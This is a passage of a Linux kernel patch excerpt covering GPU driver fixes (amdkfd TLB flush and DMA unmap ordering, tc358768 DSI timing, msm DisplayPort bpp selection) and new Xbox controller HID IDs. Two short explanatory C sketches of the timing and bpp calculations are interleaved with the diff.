++	amdgpu_ring_write(ring, (vmid | (vmid << 4) | (vmid << 8)));
+ 
+ 	amdgpu_ring_write(ring,	PACKETJ(mmUVD_LMI_JRBC_IB_64BIT_BAR_LOW_INTERNAL_OFFSET,
+ 		0, 0, PACKETJ_TYPE0));
+diff --git a/drivers/gpu/drm/amd/amdkfd/kfd_chardev.c b/drivers/gpu/drm/amd/amdkfd/kfd_chardev.c
+index b0f475d51ae7e..e3cd66c4d95d8 100644
+--- a/drivers/gpu/drm/amd/amdkfd/kfd_chardev.c
++++ b/drivers/gpu/drm/amd/amdkfd/kfd_chardev.c
+@@ -1400,17 +1400,23 @@ static int kfd_ioctl_unmap_memory_from_gpu(struct file *filep,
+ 			goto sync_memory_failed;
+ 		}
+ 	}
+-	mutex_unlock(&p->mutex);
+ 
+-	if (flush_tlb) {
+-		/* Flush TLBs after waiting for the page table updates to complete */
+-		for (i = 0; i < args->n_devices; i++) {
+-			peer_pdd = kfd_process_device_data_by_id(p, devices_arr[i]);
+-			if (WARN_ON_ONCE(!peer_pdd))
+-				continue;
++	/* Flush TLBs after waiting for the page table updates to complete */
++	for (i = 0; i < args->n_devices; i++) {
++		peer_pdd = kfd_process_device_data_by_id(p, devices_arr[i]);
++		if (WARN_ON_ONCE(!peer_pdd))
++			continue;
++		if (flush_tlb)
+ 			kfd_flush_tlb(peer_pdd, TLB_FLUSH_HEAVYWEIGHT);
+-		}
++
++		/* Remove dma mapping after tlb flush to avoid IO_PAGE_FAULT */
++		err = amdgpu_amdkfd_gpuvm_dmaunmap_mem(mem, peer_pdd->drm_priv);
++		if (err)
++			goto sync_memory_failed;
+ 	}
++
++	mutex_unlock(&p->mutex);
++
+ 	kfree(devices_arr);
+ 
+ 	return 0;
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn10/dcn10_hw_sequencer.c b/drivers/gpu/drm/amd/display/dc/dcn10/dcn10_hw_sequencer.c
+index d6c5d48c878ec..416168c7dcc52 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn10/dcn10_hw_sequencer.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn10/dcn10_hw_sequencer.c
+@@ -3633,7 +3633,7 @@ void dcn10_set_cursor_position(struct pipe_ctx *pipe_ctx)
+ 						(int)hubp->curs_attr.width || pos_cpy.x
+ 						<= (int)hubp->curs_attr.width +
+ 						pipe_ctx->plane_state->src_rect.x) {
+-						pos_cpy.x = 2 * viewport_width - temp_x;
++						pos_cpy.x = temp_x + viewport_width;
+ 					}
+ 				}
+ 			} else {
+diff --git a/drivers/gpu/drm/bridge/tc358768.c b/drivers/gpu/drm/bridge/tc358768.c
+index 8429b6518b502..aabdb5c74d936 100644
+--- a/drivers/gpu/drm/bridge/tc358768.c
++++ b/drivers/gpu/drm/bridge/tc358768.c
+@@ -9,6 +9,7 @@
+ #include <linux/gpio/consumer.h>
+ #include <linux/i2c.h>
+ #include <linux/kernel.h>
++#include <linux/math64.h>
+ #include <linux/media-bus-format.h>
+ #include <linux/minmax.h>
+ #include <linux/module.h>
+@@ -158,6 +159,7 @@ struct tc358768_priv {
+ 	u32 frs;	/* PLL Frequency range for HSCK (post divider) */
+ 
+ 	u32 dsiclk;	/* pll_clk / 2 */
++	u32 pclk;	/* incoming pclk rate */
+ };
+ 
+ static inline struct tc358768_priv *dsi_host_to_tc358768(struct mipi_dsi_host
+@@ -381,6 +383,7 @@ static int tc358768_calc_pll(struct tc358768_priv *priv,
+ 	priv->prd = best_prd;
+ 	priv->frs = frs;
+ 	priv->dsiclk = best_pll / 2;
++	priv->pclk = mode->clock * 1000;
+ 
+ 	return 0;
+ }
+@@ -639,6 +642,28 @@ static u32 tc358768_ps_to_ns(u32 ps)
+ 	return ps / 1000;
+ }
+ 
++static u32 tc358768_dpi_to_ns(u32 val, u32 pclk)
++{
++	return (u32)div_u64((u64)val * NANO, pclk);
++}
++
++/* Convert value in DPI pixel clock units to DSI byte count */
++static u32 tc358768_dpi_to_dsi_bytes(struct tc358768_priv *priv, u32 val)
++{
++	u64 m = (u64)val * priv->dsiclk / 4 * priv->dsi_lanes;
++	u64 n = priv->pclk;
++
++	return (u32)div_u64(m + n - 1, n);
++}
++
++static u32 tc358768_dsi_bytes_to_ns(struct tc358768_priv *priv, u32 val)
++{
++	u64 m = (u64)val * NANO;
++	u64 n = priv->dsiclk / 4 * priv->dsi_lanes;
++
++	return (u32)div_u64(m, n);
++}
++
+ static void tc358768_bridge_pre_enable(struct drm_bridge *bridge)
+ {
+ 	struct tc358768_priv *priv = bridge_to_tc358768(bridge);
+@@ -648,11 +673,19 @@ static void tc358768_bridge_pre_enable(struct drm_bridge *bridge)
+ 	s32 raw_val;
+ 	const struct drm_display_mode *mode;
+ 	u32 hsbyteclk_ps, dsiclk_ps, ui_ps;
+-	u32 dsiclk, hsbyteclk, video_start;
+-	const u32 internal_delay = 40;
++	u32 dsiclk, hsbyteclk;
+ 	int ret, i;
+ 	struct videomode vm;
+ 	struct device *dev = priv->dev;
++	/* In pixelclock units */
++	u32 dpi_htot, dpi_data_start;
++	/* In byte units */
++	u32 dsi_dpi_htot, dsi_dpi_data_start;
++	u32 dsi_hsw, dsi_hbp, dsi_hact, dsi_hfp;
++	const u32 dsi_hss = 4; /* HSS is a short packet (4 bytes) */
++	/* In hsbyteclk units */
++	u32 dsi_vsdly;
++	const u32 internal_dly = 40;
+ 
+ 	if (mode_flags & MIPI_DSI_CLOCK_NON_CONTINUOUS) {
+ 		dev_warn_once(dev, "Non-continuous mode unimplemented, falling back to continuous\n");
+@@ -687,27 +720,23 @@ static void tc358768_bridge_pre_enable(struct drm_bridge *bridge)
+ 	case MIPI_DSI_FMT_RGB888:
+ 		val |= (0x3 << 4);
+ 		hact = vm.hactive * 3;
+-		video_start = (vm.hsync_len + vm.hback_porch) * 3;
+ 		data_type = MIPI_DSI_PACKED_PIXEL_STREAM_24;
+ 		break;
+ 	case MIPI_DSI_FMT_RGB666:
+ 		val |= (0x4 << 4);
+ 		hact = vm.hactive * 3;
+-		video_start = (vm.hsync_len + vm.hback_porch) * 3;
+ 		data_type = MIPI_DSI_PACKED_PIXEL_STREAM_18;
+ 		break;
+ 
+ 	case MIPI_DSI_FMT_RGB666_PACKED:
+ 		val |= (0x4 << 4) | BIT(3);
+ 		hact = vm.hactive * 18 / 8;
+-		video_start = (vm.hsync_len + vm.hback_porch) * 18 / 8;
+ 		data_type = MIPI_DSI_PIXEL_STREAM_3BYTE_18;
+ 		break;
+ 
+ 	case MIPI_DSI_FMT_RGB565:
+ 		val |= (0x5 << 4);
+ 		hact = vm.hactive * 2;
+-		video_start = (vm.hsync_len + vm.hback_porch) * 2;
+ 		data_type = MIPI_DSI_PACKED_PIXEL_STREAM_16;
+ 		break;
+ 	default:
+@@ -717,9 +746,152 @@ static void tc358768_bridge_pre_enable(struct drm_bridge *bridge)
+ 		return;
+ 	}
+ 
++	/*
++	 * There are three important things to make TC358768 work correctly,
++	 * which are not trivial to manage:
++	 *
++	 * 1. Keep the DPI line-time and the DSI line-time as close to each
++	 *    other as possible.
++	 * 2. TC358768 goes to LP mode after each line's active area. The DSI
++	 *    HFP period has to be long enough for entering and exiting LP mode.
++	 *    But it is not clear how to calculate this.
++	 * 3. VSDly (video start delay) has to be long enough to ensure that the
++	 *    DSI TX does not start transmitting until we have started receiving
++	 *    pixel data from the DPI input. It is not clear how to calculate
++	 *    this either.
++	 */
++
++	dpi_htot = vm.hactive + vm.hfront_porch + vm.hsync_len + vm.hback_porch;
++	dpi_data_start = vm.hsync_len + vm.hback_porch;
++
++	dev_dbg(dev, "dpi horiz timing (pclk): %u + %u + %u + %u = %u\n",
++		vm.hsync_len, vm.hback_porch, vm.hactive, vm.hfront_porch,
++		dpi_htot);
++
++	dev_dbg(dev, "dpi horiz timing (ns): %u + %u + %u + %u = %u\n",
++		tc358768_dpi_to_ns(vm.hsync_len, vm.pixelclock),
++		tc358768_dpi_to_ns(vm.hback_porch, vm.pixelclock),
++		tc358768_dpi_to_ns(vm.hactive, vm.pixelclock),
++		tc358768_dpi_to_ns(vm.hfront_porch, vm.pixelclock),
++		tc358768_dpi_to_ns(dpi_htot, vm.pixelclock));
++
++	dev_dbg(dev, "dpi data start (ns): %u + %u = %u\n",
++		tc358768_dpi_to_ns(vm.hsync_len, vm.pixelclock),
++		tc358768_dpi_to_ns(vm.hback_porch, vm.pixelclock),
++		tc358768_dpi_to_ns(dpi_data_start, vm.pixelclock));
++
++	dsi_dpi_htot = tc358768_dpi_to_dsi_bytes(priv, dpi_htot);
++	dsi_dpi_data_start = tc358768_dpi_to_dsi_bytes(priv, dpi_data_start);
++
++	if (dsi_dev->mode_flags & MIPI_DSI_MODE_VIDEO_SYNC_PULSE) {
++		dsi_hsw = tc358768_dpi_to_dsi_bytes(priv, vm.hsync_len);
++		dsi_hbp = tc358768_dpi_to_dsi_bytes(priv, vm.hback_porch);
++	} else {
++		/* HBP is included in HSW in event mode */
++		dsi_hbp = 0;
++		dsi_hsw = tc358768_dpi_to_dsi_bytes(priv,
++						    vm.hsync_len +
++						    vm.hback_porch);
++
++		/*
++		 * The pixel packet includes the actual pixel data, and:
++		 * DSI packet header = 4 bytes
++		 * DCS code = 1 byte
++		 * DSI packet footer = 2 bytes
++		 */
++		dsi_hact = hact + 4 + 1 + 2;
++
++		dsi_hfp = dsi_dpi_htot - dsi_hact - dsi_hsw - dsi_hss;
++
++		/*
++		 * Here we should check if HFP is long enough for entering LP
++		 * and exiting LP, but it's not clear how to calculate that.
++		 * Instead, this is a naive algorithm that just adjusts the HFP
++		 * and HSW so that HFP is (at least) roughly 2/3 of the total
++		 * blanking time.
++		 */
++		if (dsi_hfp < (dsi_hfp + dsi_hsw + dsi_hss) * 2 / 3) {
++			u32 old_hfp = dsi_hfp;
++			u32 old_hsw = dsi_hsw;
++			u32 tot = dsi_hfp + dsi_hsw + dsi_hss;
++
++			dsi_hsw = tot / 3;
++
++			/*
++			 * HSW sometimes seems to need to be divisible by the
++			 * number of lanes, but not always...
++			 */
++			dsi_hsw = roundup(dsi_hsw, priv->dsi_lanes);
++
++			dsi_hfp = dsi_dpi_htot - dsi_hact - dsi_hsw - dsi_hss;
++
++			dev_dbg(dev,
++				"hfp too short, adjusting dsi hfp and dsi hsw from %u, %u to %u, %u\n",
++				old_hfp, old_hsw, dsi_hfp, dsi_hsw);
++		}
++
++		dev_dbg(dev,
++			"dsi horiz timing (bytes): %u, %u + %u + %u + %u = %u\n",
++			dsi_hss, dsi_hsw, dsi_hbp, dsi_hact, dsi_hfp,
++			dsi_hss + dsi_hsw + dsi_hbp + dsi_hact + dsi_hfp);
++
++		dev_dbg(dev, "dsi horiz timing (ns): %u + %u + %u + %u + %u = %u\n",
++			tc358768_dsi_bytes_to_ns(priv, dsi_hss),
++			tc358768_dsi_bytes_to_ns(priv, dsi_hsw),
++			tc358768_dsi_bytes_to_ns(priv, dsi_hbp),
++			tc358768_dsi_bytes_to_ns(priv, dsi_hact),
++			tc358768_dsi_bytes_to_ns(priv, dsi_hfp),
++			tc358768_dsi_bytes_to_ns(priv, dsi_hss + dsi_hsw +
++						 dsi_hbp + dsi_hact + dsi_hfp));
++	}
++
++	/* VSDly calculation */
++
++	/* Start with the HW internal delay */
++	dsi_vsdly = internal_dly;
++
++	/* Convert to byte units as the other variables are in byte units */
++	dsi_vsdly *= priv->dsi_lanes;
++
++	/* Do we need more delay, in addition to the internal? */
++	if (dsi_dpi_data_start > dsi_vsdly + dsi_hss + dsi_hsw + dsi_hbp) {
++		dsi_vsdly = dsi_dpi_data_start - dsi_hss - dsi_hsw - dsi_hbp;
++		dsi_vsdly = roundup(dsi_vsdly, priv->dsi_lanes);
++	}
++
++	dev_dbg(dev, "dsi data start (bytes) %u + %u + %u + %u = %u\n",
++		dsi_vsdly, dsi_hss, dsi_hsw, dsi_hbp,
++		dsi_vsdly + dsi_hss + dsi_hsw + dsi_hbp);
++
++	dev_dbg(dev, "dsi data start (ns) %u + %u + %u + %u = %u\n",
++		tc358768_dsi_bytes_to_ns(priv, dsi_vsdly),
++		tc358768_dsi_bytes_to_ns(priv, dsi_hss),
++		tc358768_dsi_bytes_to_ns(priv, dsi_hsw),
++		tc358768_dsi_bytes_to_ns(priv, dsi_hbp),
++		tc358768_dsi_bytes_to_ns(priv, dsi_vsdly + dsi_hss + dsi_hsw + dsi_hbp));
++
++	/* Convert back to hsbyteclk */
++	dsi_vsdly /= priv->dsi_lanes;
++
++	/*
++	 * The docs say that there is an internal delay of 40 cycles.
++	 * However, we get underflows if we follow that rule. If we
++	 * instead ignore the internal delay, things work. So either
++	 * the docs are wrong or the calculations are wrong.
++	 *
++	 * As a temporary fix, add the internal delay here, to counter
++	 * the subtraction when writing the register.
++	 */
++	dsi_vsdly += internal_dly;
++
++	/* Clamp to the register max */
++	if (dsi_vsdly - internal_dly > 0x3ff) {
++		dev_warn(dev, "VSDly too high, underflows likely\n");
++		dsi_vsdly = 0x3ff + internal_dly;
++	}
++
+ 	/* VSDly[9:0] */
+-	video_start = max(video_start, internal_delay + 1) - internal_delay;
+-	tc358768_write(priv, TC358768_VSDLY, video_start);
++	tc358768_write(priv, TC358768_VSDLY, dsi_vsdly - internal_dly);
+ 
+ 	tc358768_write(priv, TC358768_DATAFMT, val);
+ 	tc358768_write(priv, TC358768_DSITX_DT, data_type);
+@@ -827,18 +999,6 @@ static void tc358768_bridge_pre_enable(struct drm_bridge *bridge)
+ 
+ 		/* vbp */
+ 		tc358768_write(priv, TC358768_DSI_VBPR, vm.vback_porch);
+-
+-		/* hsw * byteclk * ndl / pclk */
+-		val = (u32)div_u64(vm.hsync_len *
+-				   (u64)hsbyteclk * priv->dsi_lanes,
+-				   vm.pixelclock);
+-		tc358768_write(priv, TC358768_DSI_HSW, val);
+-
+-		/* hbp * byteclk * ndl / pclk */
+-		val = (u32)div_u64(vm.hback_porch *
+-				   (u64)hsbyteclk * priv->dsi_lanes,
+-				   vm.pixelclock);
+-		tc358768_write(priv, TC358768_DSI_HBPR, val);
+ 	} else {
+ 		/* Set event mode */
+ 		tc358768_write(priv, TC358768_DSI_EVENT, 1);
+@@ -852,16 +1012,13 @@ static void tc358768_bridge_pre_enable(struct drm_bridge *bridge)
+ 
+ 		/* vbp (not used in event mode) */
+ 		tc358768_write(priv, TC358768_DSI_VBPR, 0);
++	}
+ 
+-		/* (hsw + hbp) * byteclk * ndl / pclk */
+-		val = (u32)div_u64((vm.hsync_len + vm.hback_porch) *
+-				   (u64)hsbyteclk * priv->dsi_lanes,
+-				   vm.pixelclock);
+-		tc358768_write(priv, TC358768_DSI_HSW, val);
++	/* hsw (bytes) */
++	tc358768_write(priv, TC358768_DSI_HSW, dsi_hsw);
+ 
+-		/* hbp (not used in event mode) */
+-		tc358768_write(priv, TC358768_DSI_HBPR, 0);
+-	}
++	/* hbp (bytes) */
++	tc358768_write(priv, TC358768_DSI_HBPR, dsi_hbp);
+ 
+ 	/* hact (bytes) */
+ 	tc358768_write(priv, TC358768_DSI_HACT, hact);
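
The new tc358768 helpers convert horizontal timing between clock domains: a value in DPI pixel clocks becomes a DSI byte count via bytes = ceil(val * (dsiclk / 4) * lanes / pclk), where dsiclk / 4 is the per-lane byte clock. A standalone sketch of the rounding-up conversion, mirroring tc358768_dpi_to_dsi_bytes(); the clock figures below are made-up examples:

#include <stdio.h>
#include <stdint.h>

/* DPI pixel-clock units -> DSI byte count, rounding up. */
static uint32_t dpi_to_dsi_bytes(uint32_t val, uint64_t dsiclk,
				 uint32_t lanes, uint64_t pclk)
{
	uint64_t m = (uint64_t)val * dsiclk / 4 * lanes;

	return (uint32_t)((m + pclk - 1) / pclk); /* ceiling division */
}

int main(void)
{
	/* Example: 4 lanes, 891 MHz DSI clock, 148.5 MHz pixel clock */
	printf("hsync of 44 px = %u DSI bytes\n",
	       dpi_to_dsi_bytes(44, 891000000ULL, 4, 148500000ULL));
	return 0;
}
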
+diff --git a/drivers/gpu/drm/lima/lima_gp.c b/drivers/gpu/drm/lima/lima_gp.c
+index ca3842f719842..82071835ec9ed 100644
+--- a/drivers/gpu/drm/lima/lima_gp.c
++++ b/drivers/gpu/drm/lima/lima_gp.c
+@@ -166,6 +166,11 @@ static void lima_gp_task_run(struct lima_sched_pipe *pipe,
+ 	gp_write(LIMA_GP_CMD, cmd);
+ }
+ 
++static int lima_gp_bus_stop_poll(struct lima_ip *ip)
++{
++	return !!(gp_read(LIMA_GP_STATUS) & LIMA_GP_STATUS_BUS_STOPPED);
++}
++
+ static int lima_gp_hard_reset_poll(struct lima_ip *ip)
+ {
+ 	gp_write(LIMA_GP_PERF_CNT_0_LIMIT, 0xC01A0000);
+@@ -179,6 +184,13 @@ static int lima_gp_hard_reset(struct lima_ip *ip)
+ 
+ 	gp_write(LIMA_GP_PERF_CNT_0_LIMIT, 0xC0FFE000);
+ 	gp_write(LIMA_GP_INT_MASK, 0);
++
++	gp_write(LIMA_GP_CMD, LIMA_GP_CMD_STOP_BUS);
++	ret = lima_poll_timeout(ip, lima_gp_bus_stop_poll, 10, 100);
++	if (ret) {
++		dev_err(dev->dev, "%s bus stop timeout\n", lima_ip_name(ip));
++		return ret;
++	}
+ 	gp_write(LIMA_GP_CMD, LIMA_GP_CMD_RESET);
+ 	ret = lima_poll_timeout(ip, lima_gp_hard_reset_poll, 10, 100);
+ 	if (ret) {
+diff --git a/drivers/gpu/drm/msm/disp/dpu1/dpu_kms.h b/drivers/gpu/drm/msm/disp/dpu1/dpu_kms.h
+index bb35aa5f5709f..41e44a77c2beb 100644
+--- a/drivers/gpu/drm/msm/disp/dpu1/dpu_kms.h
++++ b/drivers/gpu/drm/msm/disp/dpu1/dpu_kms.h
+@@ -31,24 +31,14 @@
+  * @fmt: Pointer to format string
+  */
+ #define DPU_DEBUG(fmt, ...)                                                \
+-	do {                                                               \
+-		if (drm_debug_enabled(DRM_UT_KMS))                         \
+-			DRM_DEBUG(fmt, ##__VA_ARGS__); \
+-		else                                                       \
+-			pr_debug(fmt, ##__VA_ARGS__);                      \
+-	} while (0)
++	DRM_DEBUG_DRIVER(fmt, ##__VA_ARGS__)
+ 
+ /**
+  * DPU_DEBUG_DRIVER - macro for hardware driver logging
+  * @fmt: Pointer to format string
+  */
+ #define DPU_DEBUG_DRIVER(fmt, ...)                                         \
+-	do {                                                               \
+-		if (drm_debug_enabled(DRM_UT_DRIVER))                      \
+-			DRM_ERROR(fmt, ##__VA_ARGS__); \
+-		else                                                       \
+-			pr_debug(fmt, ##__VA_ARGS__);                      \
+-	} while (0)
++	DRM_DEBUG_DRIVER(fmt, ##__VA_ARGS__)
+ 
+ #define DPU_ERROR(fmt, ...) pr_err("[dpu error]" fmt, ##__VA_ARGS__)
+ #define DPU_ERROR_RATELIMITED(fmt, ...) pr_err_ratelimited("[dpu error]" fmt, ##__VA_ARGS__)
+diff --git a/drivers/gpu/drm/msm/disp/dpu1/dpu_plane.c b/drivers/gpu/drm/msm/disp/dpu1/dpu_plane.c
+index 62d48c0f905e4..61c456c5015a5 100644
+--- a/drivers/gpu/drm/msm/disp/dpu1/dpu_plane.c
++++ b/drivers/gpu/drm/msm/disp/dpu1/dpu_plane.c
+@@ -889,6 +889,9 @@ static int dpu_plane_prepare_fb(struct drm_plane *plane,
+ 			new_state->fb, &layout);
+ 	if (ret) {
+ 		DPU_ERROR_PLANE(pdpu, "failed to get format layout, %d\n", ret);
++		if (pstate->aspace)
++			msm_framebuffer_cleanup(new_state->fb, pstate->aspace,
++						pstate->needs_dirtyfb);
+ 		return ret;
+ 	}
+ 
+diff --git a/drivers/gpu/drm/msm/dp/dp_ctrl.c b/drivers/gpu/drm/msm/dp/dp_ctrl.c
+index bd1343602f553..3c001b792423b 100644
+--- a/drivers/gpu/drm/msm/dp/dp_ctrl.c
++++ b/drivers/gpu/drm/msm/dp/dp_ctrl.c
+@@ -1248,6 +1248,8 @@ static int dp_ctrl_link_train(struct dp_ctrl_private *ctrl,
+ 	link_info.rate = ctrl->link->link_params.rate;
+ 	link_info.capabilities = DP_LINK_CAP_ENHANCED_FRAMING;
+ 
++	dp_link_reset_phy_params_vx_px(ctrl->link);
++
+ 	dp_aux_link_configure(ctrl->aux, &link_info);
+ 
+ 	if (drm_dp_max_downspread(dpcd))
+diff --git a/drivers/gpu/drm/msm/dp/dp_panel.c b/drivers/gpu/drm/msm/dp/dp_panel.c
+index d38086650fcf7..f2cc0cc0b66b7 100644
+--- a/drivers/gpu/drm/msm/dp/dp_panel.c
++++ b/drivers/gpu/drm/msm/dp/dp_panel.c
+@@ -113,22 +113,22 @@ static int dp_panel_read_dpcd(struct dp_panel *dp_panel)
+ static u32 dp_panel_get_supported_bpp(struct dp_panel *dp_panel,
+ 		u32 mode_edid_bpp, u32 mode_pclk_khz)
+ {
+-	struct dp_link_info *link_info;
++	const struct dp_link_info *link_info;
+ 	const u32 max_supported_bpp = 30, min_supported_bpp = 18;
+-	u32 bpp = 0, data_rate_khz = 0;
++	u32 bpp, data_rate_khz;
+ 
+-	bpp = min_t(u32, mode_edid_bpp, max_supported_bpp);
++	bpp = min(mode_edid_bpp, max_supported_bpp);
+ 
+ 	link_info = &dp_panel->link_info;
+ 	data_rate_khz = link_info->num_lanes * link_info->rate * 8;
+ 
+-	while (bpp > min_supported_bpp) {
++	do {
+ 		if (mode_pclk_khz * bpp <= data_rate_khz)
+-			break;
++			return bpp;
+ 		bpp -= 6;
+-	}
++	} while (bpp > min_supported_bpp);
+ 
+-	return bpp;
++	return min_supported_bpp;
+ }
+ 
+ static int dp_panel_update_modes(struct drm_connector *connector,
+@@ -421,8 +421,9 @@ int dp_panel_init_panel_info(struct dp_panel *dp_panel)
+ 				drm_mode->clock);
+ 	drm_dbg_dp(panel->drm_dev, "bpp = %d\n", dp_panel->dp_mode.bpp);
+ 
+-	dp_panel->dp_mode.bpp = max_t(u32, 18,
+-				min_t(u32, dp_panel->dp_mode.bpp, 30));
++	dp_panel->dp_mode.bpp = dp_panel_get_mode_bpp(dp_panel, dp_panel->dp_mode.bpp,
++						      dp_panel->dp_mode.drm_mode.clock);
++
+ 	drm_dbg_dp(panel->drm_dev, "updated bpp = %d\n",
+ 				dp_panel->dp_mode.bpp);
+ 
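
The reworked dp_panel_get_supported_bpp() walks down from the EDID-preferred depth in steps of 6 bpp until the mode's bandwidth fits the link, and now falls back to the minimum explicitly rather than returning whatever the loop last held. A standalone sketch of that selection; units follow the driver's convention and the figures are illustrative:

#include <stdio.h>
#include <stdint.h>

static uint32_t pick_bpp(uint32_t edid_bpp, uint32_t pclk_khz,
			 uint32_t lanes, uint32_t rate)
{
	const uint32_t max_bpp = 30, min_bpp = 18;
	uint32_t data_rate_khz = lanes * rate * 8;
	uint32_t bpp = edid_bpp < max_bpp ? edid_bpp : max_bpp;

	do {
		if ((uint64_t)pclk_khz * bpp <= data_rate_khz)
			return bpp;
		bpp -= 6;
	} while (bpp > min_bpp);

	/* The old loop could fall out still holding a bpp the link cannot
	 * carry; returning the floor makes the fallback explicit. */
	return min_bpp;
}

int main(void)
{
	printf("bpp = %u\n", pick_bpp(30, 533250, 2, 162000));
	return 0;
}
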
+diff --git a/drivers/gpu/drm/msm/msm_gem_shrinker.c b/drivers/gpu/drm/msm/msm_gem_shrinker.c
+index 31f054c903a43..a35c98306f1e5 100644
+--- a/drivers/gpu/drm/msm/msm_gem_shrinker.c
++++ b/drivers/gpu/drm/msm/msm_gem_shrinker.c
+@@ -76,7 +76,7 @@ static bool
+ wait_for_idle(struct drm_gem_object *obj)
+ {
+ 	enum dma_resv_usage usage = dma_resv_usage_rw(true);
+-	return dma_resv_wait_timeout(obj->resv, usage, false, 1000) > 0;
++	return dma_resv_wait_timeout(obj->resv, usage, false, 10) > 0;
+ }
+ 
+ static bool
+diff --git a/drivers/gpu/drm/rockchip/rockchip_drm_vop2.c b/drivers/gpu/drm/rockchip/rockchip_drm_vop2.c
+index 80b8c83342840..a6071464a543f 100644
+--- a/drivers/gpu/drm/rockchip/rockchip_drm_vop2.c
++++ b/drivers/gpu/drm/rockchip/rockchip_drm_vop2.c
+@@ -1258,6 +1258,11 @@ static void vop2_plane_atomic_update(struct drm_plane *plane,
+ 		vop2_win_write(win, VOP2_WIN_AFBC_ROTATE_270, rotate_270);
+ 		vop2_win_write(win, VOP2_WIN_AFBC_ROTATE_90, rotate_90);
+ 	} else {
++		if (vop2_cluster_window(win)) {
++			vop2_win_write(win, VOP2_WIN_AFBC_ENABLE, 0);
++			vop2_win_write(win, VOP2_WIN_AFBC_TRANSFORM_OFFSET, 0);
++		}
++
+ 		vop2_win_write(win, VOP2_WIN_YRGB_VIR, DIV_ROUND_UP(fb->pitches[0], 4));
+ 	}
+ 
+diff --git a/drivers/gpu/drm/tegra/gem.c b/drivers/gpu/drm/tegra/gem.c
+index 81991090adcc9..cd06f25499549 100644
+--- a/drivers/gpu/drm/tegra/gem.c
++++ b/drivers/gpu/drm/tegra/gem.c
+@@ -175,7 +175,7 @@ static void tegra_bo_unpin(struct host1x_bo_mapping *map)
+ static void *tegra_bo_mmap(struct host1x_bo *bo)
+ {
+ 	struct tegra_bo *obj = host1x_to_tegra_bo(bo);
+-	struct iosys_map map;
++	struct iosys_map map = { 0 };
+ 	int ret;
+ 
+ 	if (obj->vaddr) {
+diff --git a/drivers/hid/hid-ids.h b/drivers/hid/hid-ids.h
+index 0e5b2b3dea4d0..1395270a30cb0 100644
+--- a/drivers/hid/hid-ids.h
++++ b/drivers/hid/hid-ids.h
+@@ -924,7 +924,15 @@
+ #define USB_DEVICE_ID_MS_TYPE_COVER_2    0x07a9
+ #define USB_DEVICE_ID_MS_POWER_COVER     0x07da
+ #define USB_DEVICE_ID_MS_SURFACE3_COVER		0x07de
+-#define USB_DEVICE_ID_MS_XBOX_ONE_S_CONTROLLER	0x02fd
++/*
++ * For a description of the Xbox controller models, refer to:
++ * https://en.wikipedia.org/wiki/Xbox_Wireless_Controller#Summary
++ */
++#define USB_DEVICE_ID_MS_XBOX_CONTROLLER_MODEL_1708	0x02fd
++#define USB_DEVICE_ID_MS_XBOX_CONTROLLER_MODEL_1708_BLE	0x0b20
++#define USB_DEVICE_ID_MS_XBOX_CONTROLLER_MODEL_1914	0x0b13
++#define USB_DEVICE_ID_MS_XBOX_CONTROLLER_MODEL_1797	0x0b05
++#define USB_DEVICE_ID_MS_XBOX_CONTROLLER_MODEL_1797_BLE	0x0b22
+ #define USB_DEVICE_ID_MS_PIXART_MOUSE    0x00cb
+ #define USB_DEVICE_ID_8BITDO_SN30_PRO_PLUS      0x02e0
+ #define USB_DEVICE_ID_MS_MOUSE_0783      0x0783
+diff --git a/drivers/hid/hid-microsoft.c b/drivers/hid/hid-microsoft.c
+index 071fd093a5f4e..9345e2bfd56ed 100644
+--- a/drivers/hid/hid-microsoft.c
++++ b/drivers/hid/hid-microsoft.c
+@@ -446,7 +446,16 @@ static const struct hid_device_id ms_devices[] = {
+ 		.driver_data = MS_PRESENTER },
+ 	{ HID_BLUETOOTH_DEVICE(USB_VENDOR_ID_MICROSOFT, 0x091B),
+ 		.driver_data = MS_SURFACE_DIAL },
+-	{ HID_BLUETOOTH_DEVICE(USB_VENDOR_ID_MICROSOFT, USB_DEVICE_ID_MS_XBOX_ONE_S_CONTROLLER),
++
++	{ HID_BLUETOOTH_DEVICE(USB_VENDOR_ID_MICROSOFT, USB_DEVICE_ID_MS_XBOX_CONTROLLER_MODEL_1708),
++		.driver_data = MS_QUIRK_FF },
++	{ HID_BLUETOOTH_DEVICE(USB_VENDOR_ID_MICROSOFT, USB_DEVICE_ID_MS_XBOX_CONTROLLER_MODEL_1708_BLE),
++		.driver_data = MS_QUIRK_FF },
++	{ HID_BLUETOOTH_DEVICE(USB_VENDOR_ID_MICROSOFT, USB_DEVICE_ID_MS_XBOX_CONTROLLER_MODEL_1914),
++		.driver_data = MS_QUIRK_FF },
++	{ HID_BLUETOOTH_DEVICE(USB_VENDOR_ID_MICROSOFT, USB_DEVICE_ID_MS_XBOX_CONTROLLER_MODEL_1797),
++		.driver_data = MS_QUIRK_FF },
++	{ HID_BLUETOOTH_DEVICE(USB_VENDOR_ID_MICROSOFT, USB_DEVICE_ID_MS_XBOX_CONTROLLER_MODEL_1797_BLE),
+ 		.driver_data = MS_QUIRK_FF },
+ 	{ HID_BLUETOOTH_DEVICE(USB_VENDOR_ID_MICROSOFT, USB_DEVICE_ID_8BITDO_SN30_PRO_PLUS),
+ 		.driver_data = MS_QUIRK_FF },
+diff --git a/drivers/hid/wacom_wac.c b/drivers/hid/wacom_wac.c
+index 05e40880e7d46..82f171f6d0c53 100644
+--- a/drivers/hid/wacom_wac.c
++++ b/drivers/hid/wacom_wac.c
+@@ -1921,12 +1921,14 @@ static void wacom_map_usage(struct input_dev *input, struct hid_usage *usage,
+ 	int fmax = field->logical_maximum;
+ 	unsigned int equivalent_usage = wacom_equivalent_usage(usage->hid);
+ 	int resolution_code = code;
+-	int resolution = hidinput_calc_abs_res(field, resolution_code);
++	int resolution;
+ 
+ 	if (equivalent_usage == HID_DG_TWIST) {
+ 		resolution_code = ABS_RZ;
+ 	}
+ 
++	resolution = hidinput_calc_abs_res(field, resolution_code);
++
+ 	if (equivalent_usage == HID_GD_X) {
+ 		fmin += features->offset_left;
+ 		fmax -= features->offset_right;
+diff --git a/drivers/hwmon/ltc2992.c b/drivers/hwmon/ltc2992.c
+index d88e883c7492c..b5dc0b7d25ae7 100644
+--- a/drivers/hwmon/ltc2992.c
++++ b/drivers/hwmon/ltc2992.c
+@@ -875,8 +875,14 @@ static int ltc2992_parse_dt(struct ltc2992_state *st)
+ 		}
+ 
+ 		ret = fwnode_property_read_u32(child, "shunt-resistor-micro-ohms", &val);
+-		if (!ret)
++		if (!ret) {
